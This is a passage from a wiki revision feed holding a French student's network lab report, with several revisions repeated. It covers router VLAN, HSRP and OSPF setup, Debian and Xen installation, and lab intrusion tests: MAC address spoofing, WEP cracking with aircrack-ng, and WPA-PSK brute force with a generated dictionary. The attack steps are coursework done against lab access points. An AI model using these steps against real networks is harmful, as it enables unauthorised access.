Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout hunt3r.key -out serveur.csr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23097</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23097"/>
				<updated>2015-11-20T10:30:46Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23089</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23089"/>
				<updated>2015-11-20T09:48:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
